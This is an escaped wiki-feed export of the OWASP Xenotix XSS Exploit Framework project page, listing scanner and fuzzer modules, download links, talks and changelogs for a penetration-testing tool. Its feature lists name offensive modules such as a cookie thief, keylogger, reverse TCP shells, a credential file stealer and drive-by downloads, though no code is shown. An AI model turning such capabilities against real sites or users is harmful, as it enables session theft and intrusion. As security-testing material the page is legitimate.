====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|R8AgEWPFJ1g}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186016</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186016"/>
				<updated>2014-11-26T04:18:40Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|R8AgEWPFJ1g}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
